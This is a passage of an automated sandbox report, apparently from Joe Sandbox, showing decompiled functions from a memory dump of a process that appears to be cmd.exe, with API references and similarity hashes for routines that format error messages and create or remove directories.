				if(_t29 != 0) {
					L5:
					E00D96B76(_t59, L"%s", _v116);
					_t56 =  *((intOrPtr*)(_t59 + 0x10));
					if(E00D8BED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
						E00D8B6CB(_t59);
					}
					LocalFree(_v116);
					_t33 = 0;
				} else {
					__imp___ultoa(_a8,  &_v44, 0x10);
					_t38 = E00D90638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
					_v128 =  &_v112;
					_t43 = L"Application";
					if(_a8 < 0x2328) {
						_t43 = L"System";
					}
					_v124 = _t43;
					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
					if(_t46 != 0) {
						goto L5;
					} else {
						_t33 = _t46 + 1;
					}
				}
				return E00D96FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
			}

0x00da7c83
0x00da7c83
0x00da7c8b
0x00da7c92
0x00da7c96
0x00da7c9d
0x00da7ca5
0x00da7cb9
0x00da7cbf
0x00da7cc4
0x00da7d3e
0x00da7d48
0x00da7d4d
0x00da7d59
0x00da7d5d
0x00da7d5d
0x00da7d65
0x00da7d6b
0x00da7cc6
0x00da7ccf
0x00da7ce0
0x00da7cef
0x00da7cf9
0x00da7d09
0x00da7d0c
0x00da7d11
0x00da7d13
0x00da7d13
0x00da7d18
0x00da7d31
0x00da7d39
0x00000000
0x00da7d3b
0x00da7d3b
0x00da7d3b
0x00da7d39
0x00da7d7c

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 00DA7CB9
_ultoa.MSVCRT ref: 00DA7CCF
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00DA7CD8
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,00DAA21D,000000FF,?,00000020), ref: 00DA7CF9
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00DA7D31
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00DA7D65

Strings

System, xrefs: 00DA7D13
(#, xrefs: 00DA7CFF
Application, xrefs: 00DA7D0C

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
String ID: (#$Application$System
API String ID: 3377411628-593978566
Opcode ID: b6bc348a1b90dbaacb972c11bbe609d125164215ee4bb559d91d515fbcc1bd2f
Instruction ID: eec9363f58e621936e75dae274432d610d4dc8fb221452ca30274ee7bdf0fe90
Opcode Fuzzy Hash: b6bc348a1b90dbaacb972c11bbe609d125164215ee4bb559d91d515fbcc1bd2f
Instruction Fuzzy Hash: C0313E71A00209AFDF119FA5DC19DEEBBB9EF89710F144229F911E7291EB309A05CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D88885, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00D88885(WCHAR* __ecx) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				WCHAR* _v20;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t15;
				signed int _t17;
				void* _t22;
				void* _t26;
				WCHAR* _t27;
				long _t28;
				signed int _t29;

				_t8 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t8 ^ _t29;
				_t27 = __ecx;
				_t28 = 0;
				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
					if(_v14 != 0x3a || _v12 != 0x5c) {
						goto L1;
					} else {
						_t15 = 0;
						L3:
						return E00D96FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
					}
				}
				L1:
				if(RemoveDirectoryW(_t27) == 0) {
					_t28 = GetLastError();
					if(_t28 == 5) {
						_t17 = GetFileAttributesW(_t27);
						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
							if(RemoveDirectoryW(_t27) == 0) {
								_t28 = GetLastError();
							} else {
								_t28 = 0;
							}
						}
					}
				}
				_t15 = _t28;
				goto L3;
			}

0x00d8888d
0x00d88894
0x00d8889c
0x00d888a2
0x00d888b1
0x00da0638
0x00000000
0x00da0649
0x00da0649
0x00d888c8
0x00d888d7
0x00d888d7
0x00da0638
0x00d888b7
0x00d888c0
0x00da0656
0x00da065b
0x00da0662
0x00da066b
0x00da0695
0x00da06a4
0x00da0697
0x00da0697
0x00da0697
0x00da0695
0x00da066b
0x00da065b
0x00d888c6
0x00000000

APIs

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,00D88857,-00000105), ref: 00D888A8
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,00D88857,-00000105), ref: 00D888B8
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,00D88857,-00000105), ref: 00DA0650
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,00D88857,-00000105), ref: 00DA0662
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,00D88857,-00000105), ref: 00DA067E
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,00D88857,-00000105), ref: 00DA068D

Strings

:, xrefs: 00DA0633
\, xrefs: 00DA063E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
String ID: :$\
API String ID: 3961617410-1166558509
Opcode ID: 10c94d2e4e4f54d77e71bcdea948dba791c9404c847d69b7703e26c25fac4439
Instruction ID: b3969b0f874f3167939c5983c3c571190f39b1d002394c0f923216919b4996ac
Opcode Fuzzy Hash: 10c94d2e4e4f54d77e71bcdea948dba791c9404c847d69b7703e26c25fac4439
Instruction Fuzzy Hash: 2D11CD31900215BB87207B74AC5C97FB779DB85760B98026DE812E3250DF70DD01E3B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D92DD2, Relevance: 15.4, APIs: 10, Instructions: 400
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00D92DD2(signed char* __ecx, signed int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				int _v1100;
				void _v1620;
				int _v1628;
				char _v1632;
				int _v1636;
				void _v2156;
				signed int _v2160;
				signed int _v2164;
				signed int _v2168;
				int _v2172;
				signed int _v2176;
				intOrPtr* _v2180;
				signed char* _v2184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t132;
				signed int _t149;
				void* _t169;
				signed int _t171;
				signed int _t181;
				signed int _t182;
				void* _t184;
				signed int _t185;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t195;
				signed int _t201;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				intOrPtr _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t222;
				void* _t243;
				signed int _t245;
				signed int _t248;
				signed int _t265;
				void* _t271;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				signed int _t284;
				signed char* _t285;
				intOrPtr* _t286;
				signed int _t289;

				_t277 = __edx;
				_t132 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t132 ^ _t289;
				_t287 = 0x104;
				_v2164 = 1;
				_t222 = 0;
				_v24 = 1;
				_v2172 = 0;
				_t285 = __ecx;
				_v28 = 0;
				_v2184 = __ecx;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1636 = 0;
				_v1632 = 1;
				_v1628 = 0x104;
				memset( &_v2156, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00D90C70( &_v2156, ((0 | _v1632 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00D90C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L10:
					_t149 = 1;
					goto L11;
				} else {
					_t169 = E00D90C70( &_v1620, ((0 | _v1096 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
					_t302 = _t169;
					if(_t169 < 0 || E00D94E94( &_v2176, _t277, _t302) == 1) {
						goto L10;
					} else {
						_t287 = _v2176;
						_t171 =  *_t285;
						if( *_t287 == 0) {
							_t171 = _t171 & 0xfffffff7;
							 *_t285 = _t171;
						}
						if((_t171 & 0x00000008) != 0) {
							 *((intOrPtr*)(_t287 + 0x24)) =  *((intOrPtr*)(_t287 + 0x1c)) - 1;
							_t171 =  *_t285;
						}
						if((_t171 & 0x00000200) != 0) {
							 *_t285 = _t171 | 0x00000004;
						}
						 *0xdc3cf0 = _t222;
						_t277 = 1;
						if(E00D94800(_t285, 1, 1,  &_v2160) != 1) {
							_v2168 = _t222;
							E00D90D89(1, 0xd824ac);
							E00D90D89(1, 0xd824ac);
							_t222 = _v2160;
							while(1) {
								__eflags = _t222;
								if(_t222 == 0) {
									break;
								}
								E00D90D89(_t277,  *(_t222 + 4));
								__eflags =  *((char*)(_t222 + 0x10));
								_t181 =  *_t285;
								if( *((char*)(_t222 + 0x10)) != 0) {
									_t181 = _t181 | 0x00000100;
									 *_t285 = _t181;
									__eflags = _t285[0x5c];
									if(_t285[0x5c] == 0) {
										L18:
										__eflags = _t181 & 0x00000040;
										if((_t181 & 0x00000040) == 0) {
											_t182 = _v28;
											__eflags = _t182;
											if(_t182 == 0) {
												_t182 =  &_v548;
											}
											E00D90D89(_t277, _t182);
											_t278 =  *(_t222 + 4);
											_t243 = _t278 + 2;
											do {
												_t184 =  *_t278;
												_t278 = _t278 + 2;
												__eflags = _t184 - _v2172;
											} while (_t184 != _v2172);
											_t185 = _v28;
											_t280 = _t278 - _t243 >> 1;
											__eflags = _t185;
											if(_t185 == 0) {
												_t185 =  &_v548;
											}
											_t277 = _t280 + 1;
											E00D94C89( *(_t222 + 4), _t280 + 1, _t185, _v20);
											_t245 = _v1636;
											__eflags = _t245;
											if(_t245 == 0) {
												_t245 =  &_v2156;
											}
											_t187 = _v28;
											__eflags = _t187;
											if(_t187 == 0) {
												_t187 =  &_v548;
											}
											__imp___wcsicmp(_t187, _t245);
											__eflags = _t187;
											if(_t187 == 0) {
												goto L19;
											} else {
												__eflags = _v2168;
												if(_v2168 == 0) {
													L48:
													_t277 =  *(_t222 + 4);
													_t219 = E00DAA834(_t287,  *(_t222 + 4));
													__eflags = _t219;
													if(_t219 != 0) {
														goto L10;
													}
													goto L19;
												}
												_t220 = E00D8B610(_t222, _t287, _t285);
												__eflags = _t220;
												if(_t220 != 0) {
													goto L10;
												}
												goto L48;
											}
										}
										L19:
										_t248 =  *_t285;
										_t285[0x64] = 0;
										_t285[0x60] = 0;
										_t285[0x68] = 0;
										_t191 = (_t248 & 0x00000010 | 0x00000020) >> 4;
										_t285[0x6c] = 0;
										__eflags = _t248 & 0x00020400;
										if((_t248 & 0x00020400) != 0) {
											_t191 = _t191 | 0x00000004;
										}
										asm("sbb ecx, ecx");
										_t277 = _t287;
										_t253 = _t222;
										_t192 = E00D95266(_t222, _t287, _t285[4], _t285[8], _t191, _t285, 0, E00D965F0,  !( ~(_t248 & 0x00004004)) & E00D96550, E00D964F0);
										_v2164 = _t192;
										__eflags = _t192;
										if(_t192 != 0) {
											L70:
											__eflags =  *0xdad544;
											if( *0xdad544 != 0) {
												goto L23;
											}
											__eflags = _t192 - 5;
											if(_t192 != 5) {
												__eflags = _t285[0x60] + _t285[0x64];
												if(_t285[0x60] + _t285[0x64] != 0) {
													goto L23;
												}
												E00D8B6CB(_t287);
												__eflags = 0;
												_push(0);
												_push(0x40002711);
												E00D8C5A2(_t287);
												_v2164 = 1;
												L75:
												goto L23;
											}
											_push(0);
											_push(5);
											E00D8C5A2(_t253);
											goto L75;
										} else {
											__eflags = _t285[0x60] + _t285[0x64];
											if(_t285[0x60] + _t285[0x64] == 0) {
												_t192 = _v2164;
												goto L70;
											}
											__eflags =  *_t285 & 0x00000040;
											if(( *_t285 & 0x00000040) == 0) {
												E00D90D89(_t277, 0xd824ac);
												_t212 =  *_t222;
												__eflags = _t212;
												if(_t212 == 0) {
													L57:
													_t265 = _v28;
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 =  &_v548;
													}
													_t213 = _v564;
													__eflags = _t213;
													if(_t213 == 0) {
														_t213 =  &_v1084;
													}
													__imp___wcsicmp(_t213, _t265);
													__eflags = _t213;
													if(_t213 == 0) {
														goto L23;
													} else {
														__eflags =  *_t285 & 0x00000010;
														if(( *_t285 & 0x00000010) == 0) {
															L65:
															_t277 = _v1100;
															__eflags = _v1100;
															if(__eflags == 0) {
																_t277 =  &_v1620;
															}
															_t149 = E00DAA0D2(_t287, _t277, __eflags,  *_t285, _t285[0x64]);
															__eflags = _t149;
															if(_t149 != 0) {
																L11:
																_v2164 = _t149;
																L12:
																__imp__??_V@YAXPAX@Z(_v1100);
																__imp__??_V@YAXPAX@Z(_v564);
																__imp__??_V@YAXPAX@Z(_v1636);
																__imp__??_V@YAXPAX@Z();
																return E00D96FD0(_v2164, _t222, _v8 ^ _t289, _t277, _t285, _t287, _v28);
															} else {
																goto L23;
															}
														}
														_t149 = E00D8B610(_t222, _t287, _t285);
														__eflags = _t149;
														if(__eflags != 0) {
															goto L11;
														}
														_t277 = _t285[0x60];
														_t149 = E00DAA7F6(_t222, _t287, _t285[0x60], __eflags,  &(_t285[0x68]),  *_t285);
														__eflags = _t149;
														if(_t149 != 0) {
															goto L11;
														}
														goto L65;
													}
												}
												_t215 =  *((intOrPtr*)(_t212 + 4));
												_t282 = _t215;
												_v2160 = _t215;
												_t271 = _t282 + 2;
												do {
													_t216 =  *_t282;
													_t282 = _t282 + 2;
													__eflags = _t216 - _v2172;
												} while (_t216 != _v2172);
												_t217 = _v564;
												_t284 = _t282 - _t271 >> 1;
												__eflags = _t217;
												if(_t217 == 0) {
													_t217 =  &_v1084;
												}
												_t277 = _t284 + 1;
												__eflags = _t284 + 1;
												E00D94C89(_v2160, _t284 + 1, _t217, _v556);
												goto L57;
											}
											L23:
											E00D90040( *(_t222 + 4));
											_t194 =  *((intOrPtr*)(_t222 + 0xc));
											_v2180 = _t194;
											_v2160 = 1;
											__eflags =  *((intOrPtr*)(_t222 + 8)) - 1;
											if( *((intOrPtr*)(_t222 + 8)) < 1) {
												L27:
												_t195 = _v2168;
												__eflags = _t195;
												if(_t195 != 0) {
													E00D90040(_t195);
												}
												_v2168 = _t222;
												_t222 =  *_t222;
												continue;
											}
											_t286 = _t194;
											do {
												E00D90040( *_t286);
												E00D90040( *((intOrPtr*)(_t286 + 4)));
												E00D90040(_t286);
												_t286 =  *((intOrPtr*)(_t286 + 0xc));
												_t201 = _v2160 + 1;
												_v2160 = _t201;
												__eflags = _t201 -  *((intOrPtr*)(_t222 + 8));
											} while (_t201 <=  *((intOrPtr*)(_t222 + 8)));
											_t285 = _v2184;
											_t287 = _v2176;
											goto L27;
										}
									}
									_push(0);
									_push(0x40002713);
									E00D8C5A2(0);
									goto L10;
								}
								__eflags = _t181 & 0x00020000;
								if((_t181 & 0x00020000) == 0) {
									_t181 = _t181 | 0x00000002;
									__eflags = _t181;
									 *_t285 = _t181;
								}
								goto L18;
							}
							E00D8B6CB(_t287);
							goto L12;
						} else {
							goto L10;
						}
					}
				}
			}

0x00d92dd2
0x00d92ddd
0x00d92de4
0x00d92dea
0x00d92def
0x00d92df9
0x00d92dfb
0x00d92e06
0x00d92e0c
0x00d92e0e
0x00d92e13
0x00d92e19
0x00d92e1c
0x00d92e24
0x00d92e30
0x00d92e37
0x00d92e40
0x00d92e48
0x00d92e54
0x00d92e5b
0x00d92e64
0x00d92e6c
0x00d92e78
0x00d92e7f
0x00d92e88
0x00d92eae
0x00d92f72
0x00d92f74
0x00000000
0x00d92efe
0x00d92f18
0x00d92f1d
0x00d92f1f
0x00000000
0x00d92f31
0x00d92f31
0x00d92f37
0x00d92f3b
0x00d92f3d
0x00d92f40
0x00d92f40
0x00d92f44
0x00d9d999
0x00d9d99c
0x00d9d99c
0x00d92f4f
0x00d9d9a6
0x00d9d9a6
0x00d92f5b
0x00d92f64
0x00d92f70
0x00d92fc3
0x00d92fd5
0x00d92fe1
0x00d92fe6
0x00d92fec
0x00d92fec
0x00d92fee
0x00000000
0x00000000
0x00d92ffd
0x00d93002
0x00d93006
0x00d93008
0x00d9d9ad
0x00d9d9b4
0x00d9d9b6
0x00d9d9b9
0x00d9301a
0x00d9301a
0x00d9301c
0x00d9d9d1
0x00d9d9d4
0x00d9d9d6
0x00d9d9d8
0x00d9d9d8
0x00d9d9e5
0x00d9d9ea
0x00d9d9ed
0x00d9d9f0
0x00d9d9f0
0x00d9d9f3
0x00d9d9f6
0x00d9d9f6
0x00d9d9ff
0x00d9da04
0x00d9da06
0x00d9da08
0x00d9da0a
0x00d9da0a
0x00d9da16
0x00d9da18
0x00d9da1d
0x00d9da23
0x00d9da25
0x00d9da27
0x00d9da27
0x00d9da2d
0x00d9da30
0x00d9da32
0x00d9da34
0x00d9da34
0x00d9da3c
0x00d9da44
0x00d9da46
0x00000000
0x00d9da4c
0x00d9da4c
0x00d9da53
0x00d9da64
0x00d9da64
0x00d9da69
0x00d9da6e
0x00d9da70
0x00000000
0x00000000
0x00000000
0x00d9da76
0x00d9da57
0x00d9da5c
0x00d9da5e
0x00000000
0x00000000
0x00000000
0x00d9da5e
0x00d9da46
0x00d93022
0x00d93022
0x00d93028
0x00d9302e
0x00d93034
0x00d93037
0x00d9303a
0x00d9303d
0x00d93043
0x00d9da7b
0x00d9da7b
0x00d93056
0x00d9306c
0x00d9306e
0x00d93073
0x00d93078
0x00d9307e
0x00d93080
0x00d9db67
0x00d9db67
0x00d9db6e
0x00000000
0x00000000
0x00d9db74
0x00d9db77
0x00d9db88
0x00d9db8b
0x00000000
0x00000000
0x00d9db93
0x00d9db98
0x00d9db9a
0x00d9db9b
0x00d9dba0
0x00d9dba5
0x00d9dbaf
0x00000000
0x00d9dbb0
0x00d9db7b
0x00d9db7c
0x00d9db7e
0x00000000
0x00d93086
0x00d93089
0x00d9308c
0x00d9db61
0x00000000
0x00d9db61
0x00d93092
0x00d93095
0x00d9da8e
0x00d9da93
0x00d9da95
0x00d9da97
0x00d9dadd
0x00d9dadd
0x00d9dae0
0x00d9dae2
0x00d9dae4
0x00d9dae4
0x00d9daea
0x00d9daf0
0x00d9daf2
0x00d9daf4
0x00d9daf4
0x00d9dafc
0x00d9db04
0x00d9db06
0x00000000
0x00d9db0c
0x00d9db0c
0x00d9db0f
0x00d9db38
0x00d9db38
0x00d9db3e
0x00d9db40
0x00d9db42
0x00d9db42
0x00d9db4f
0x00d9db54
0x00d9db56
0x00d92f75
0x00d92f75
0x00d92f7b
0x00d92f81
0x00d92f8e
0x00d92f9b
0x00d92fa5
0x00d92fc2
0x00d9db5c
0x00000000
0x00d9db5c
0x00d9db56
0x00d9db13
0x00d9db18
0x00d9db1a
0x00000000
0x00000000
0x00d9db22
0x00d9db2b
0x00d9db30
0x00d9db32
0x00000000
0x00000000
0x00000000
0x00d9db32
0x00d9db06
0x00d9da99
0x00d9da9c
0x00d9da9e
0x00d9daa4
0x00d9daa7
0x00d9daa7
0x00d9daaa
0x00d9daad
0x00d9daad
0x00d9dab6
0x00d9dabe
0x00d9dac0
0x00d9dac2
0x00d9dac4
0x00d9dac4
0x00d9dad6
0x00d9dad6
0x00d9dad8
0x00000000
0x00d9dad8
0x00d9309b
0x00d9309e
0x00d930a3
0x00d930a9
0x00d930af
0x00d930b5
0x00d930b8
0x00d930f5
0x00d930f5
0x00d930fb
0x00d930fd
0x00d9311a
0x00d9311a
0x00d930ff
0x00d93105
0x00000000
0x00d93105
0x00d930ba
0x00d930bc
0x00d930c1
0x00d930c9
0x00d930d0
0x00d930db
0x00d930dd
0x00d930de
0x00d930e4
0x00d930e4
0x00d930e9
0x00d930ef
0x00000000
0x00d930ef
0x00d93080
0x00d9d9bf
0x00d9d9c0
0x00d9d9c5
0x00000000
0x00d9d9cb
0x00d9300e
0x00d93013
0x00d93015
0x00d93015
0x00d93018
0x00d93018
0x00000000
0x00d93013
0x00d9310e
0x00000000
0x00000000
0x00000000
0x00000000
0x00d92f70
0x00d92f1f

APIs

memset.MSVCRT ref: 00D92E1C
memset.MSVCRT ref: 00D92E40
memset.MSVCRT ref: 00D92E64
memset.MSVCRT ref: 00D92E88

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

??_V@YAXPAX@Z.MSVCRT ref: 00D92F81
??_V@YAXPAX@Z.MSVCRT ref: 00D92F8E
??_V@YAXPAX@Z.MSVCRT ref: 00D92F9B
??_V@YAXPAX@Z.MSVCRT ref: 00D92FA5

Part of subcall function 00D94E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D92F2C,-00000001,-00000001,-00000001,-00000001), ref: 00D94ED6

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$BufferConsoleInfoScreen
String ID:
API String ID: 1034426908-0
Opcode ID: c72c40d26326509d99840a5c55aee498c730ad139065c8db206881c26fd028f0
Instruction ID: cc784edf0e1128078a1caf73cfb891e7e8aeee7a60366692d869fbd48e4c130b
Opcode Fuzzy Hash: c72c40d26326509d99840a5c55aee498c730ad139065c8db206881c26fd028f0
Instruction Fuzzy Hash: B1E18E71A042199FDF249F65CC85BAABBB5FF54314F1840A9E84997241EB34EE90CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8BF30, Relevance: 15.3, APIs: 10, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00D8BF30(short* __edx, WCHAR* _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				WCHAR* _v552;
				short* _v556;
				short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t49;
				long _t59;
				struct _SECURITY_ATTRIBUTES* _t61;
				WCHAR* _t63;
				long _t64;
				WCHAR* _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				signed int _t70;
				signed int _t71;
				short* _t73;
				void* _t74;
				WCHAR* _t76;
				WCHAR* _t80;
				signed int _t81;
				signed int _t82;
				struct _SECURITY_ATTRIBUTES* _t86;
				signed int _t88;
				short* _t89;
				signed int _t97;
				short* _t100;
				WCHAR* _t101;
				WCHAR* _t103;
				WCHAR* _t104;
				struct _SECURITY_ATTRIBUTES* _t105;
				void* _t106;
				signed int _t107;

				_t100 = __edx;
				_t47 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t47 ^ _t107;
				_t104 = _a4;
				_t49 = 0x3a;
				if(_t104[1] != _t49) {
					L2:
					_t105 = 0;
					_v20 = 0x104;
					_v28 = 0;
					_t86 = 1;
					_v24 = 1;
					memset( &_v548, 0, 0x104);
					_t91 =  &_v548;
					if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t59 = 8;
						L39:
						_push(_t105);
						_push(_t59);
						L40:
						E00D8C5A2(_t91);
						L8:
						_t105 = _t86;
						L9:
						__imp__??_V@YAXPAX@Z(_v28);
						_t61 = _t105;
						L10:
						return E00D96FD0(_t61, _t86, _v8 ^ _t107, _t100, _t104, _t105);
					}
					_t63 = _v28;
					if(_t63 == 0) {
						_t63 =  &_v548;
					}
					_t91 =  &_v552;
					_t64 = GetFullPathNameW(_t104, _v20, _t63,  &_v552);
					if(_t64 == 0) {
						_t59 = GetLastError();
						goto L39;
					} else {
						if(_t64 >= 0x7fe7) {
							_push(_t104);
							_push(_t86);
							_push(0x400023d9);
							L43:
							E00D8C5A2(_t91);
							goto L8;
						}
						if(CreateDirectoryW(_t104, _t105) == 0) {
							_t59 = GetLastError();
							if(_t59 == 0xb7) {
								_push(_t104);
								_push(_t86);
								_push(0x235c);
								goto L43;
							}
							if(_t59 != 3) {
								goto L39;
							}
							if( *0xdc3cc9 == 0) {
								L29:
								_push(_t105);
								_push(0x52);
								goto L40;
							}
							_t91 = _v28;
							_t67 = _t91;
							if(_t91 == 0) {
								_t67 =  &_v548;
							}
							_t100 = 0x5c;
							_t104 = 0x3a;
							_v560 = _t100;
							if(_t67[1] != _t104) {
								_t68 = _t91;
								if(_t91 == 0) {
									_t68 =  &_v548;
								}
								if( *_t68 != _t100) {
									goto L29;
								} else {
									_t69 = _t91;
									if(_t91 == 0) {
										_t69 =  &_v548;
									}
									if(_t69[1] != _t100) {
										goto L29;
									} else {
										_t101 = _t91;
										if(_t91 == 0) {
											_t101 =  &_v548;
										}
										_t100 =  &(_t101[2]);
										_v552 = _t100;
										_t104 = _t100;
										_t70 =  *_t100 & 0x0000ffff;
										if(_t70 == 0) {
											L59:
											if( *_t100 != _t105) {
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
											}
											_t71 =  *_t100 & 0x0000ffff;
											if(_t71 == 0) {
												goto L30;
											}
											_v556 = _t71;
											_t88 = _t71;
											while(1) {
												_t73 = _t104;
												if(_t88 == _v560) {
													break;
												}
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
												_t81 =  *_t100 & 0x0000ffff;
												_v556 = _t100;
												_t88 = _t81;
												if(_t81 != 0) {
													continue;
												}
												_t73 = _t100;
												break;
											}
											_t86 = 1;
											if( *_t100 == _t105) {
												goto L30;
											}
											_t100 =  &(_t73[1]);
											goto L19;
										}
										_t89 = _t100;
										_t97 = _t70;
										_t106 = 0x5c;
										while(1) {
											_t104 = _t89;
											if(_t97 == _t106) {
												break;
											}
											_t100 =  &(_t89[1]);
											_v552 = _t100;
											_t89 = _t100;
											_t82 =  *_t100 & 0x0000ffff;
											_t104 = _t100;
											_t97 = _t82;
											if(_t82 != 0) {
												continue;
											}
											break;
										}
										_t91 = _v28;
										_t86 = 1;
										_t105 = 0;
										goto L59;
									}
								}
							} else {
								_t103 = _t91;
								if(_t91 == 0) {
									_t103 =  &_v548;
								}
								_t100 =  &(_t103[3]);
								while(1) {
									L19:
									_v552 = _t100;
									while(1) {
										L20:
										_t104 =  *_t100 & 0x0000ffff;
										if(_t104 == 0) {
											break;
										} else {
											goto L21;
										}
										while(1) {
											L21:
											_t74 = 0x5c;
											if(_t104 == _t74) {
												break;
											}
											_t100 =  &(_t100[1]);
											_v552 = _t100;
											_t80 =  *_t100 & 0x0000ffff;
											_t104 = _t80;
											if(_t80 != 0) {
												continue;
											}
											_t104 = 0x5c;
											if( *_t100 != _t104) {
												goto L20;
											}
											L26:
											 *_t100 = 0;
											_t76 = _v28;
											if(_t76 == 0) {
												_t76 =  &_v548;
											}
											if(CreateDirectoryW(_t76, _t105) != 0 || GetLastError() == 0xb7) {
												 *_v552 = _t104;
												_t91 = _v28;
												_t100 =  &(_v552[1]);
												goto L19;
											} else {
												goto L29;
											}
										}
										_t104 = 0x5c;
										goto L26;
									}
									L30:
									if(_t91 == 0) {
										_t91 =  &_v548;
									}
									if(CreateDirectoryW(_t91, _t105) != 0) {
										goto L9;
									} else {
										_t59 = GetLastError();
										if(_t59 == 0xb7) {
											goto L9;
										} else {
											goto L39;
										}
									}
								}
							}
						}
						_t86 = _t105;
						goto L8;
					}
				}
				_t98 =  *_t104;
				if(E00D929BB( *_t104) == 0) {
					_push(0);
					_push(0xf);
					E00D8C5A2(_t98);
					_t61 = 1;
					goto L10;
				}
				goto L2;
			}

0x00d8bf30
0x00d8bf3b
0x00d8bf42
0x00d8bf48
0x00d8bf4d
0x00d8bf52
0x00d8bf64
0x00d8bf69
0x00d8bf6c
0x00d8bf77
0x00d8bf7b
0x00d8bf7d
0x00d8bf80
0x00d8bf87
0x00d8bfa9
0x00d9a3d6
0x00d9a3ea
0x00d9a3ea
0x00d9a3eb
0x00d9a3ec
0x00d9a3ec
0x00d8bfed
0x00d8bfed
0x00d8bfef
0x00d8bff2
0x00d8bff8
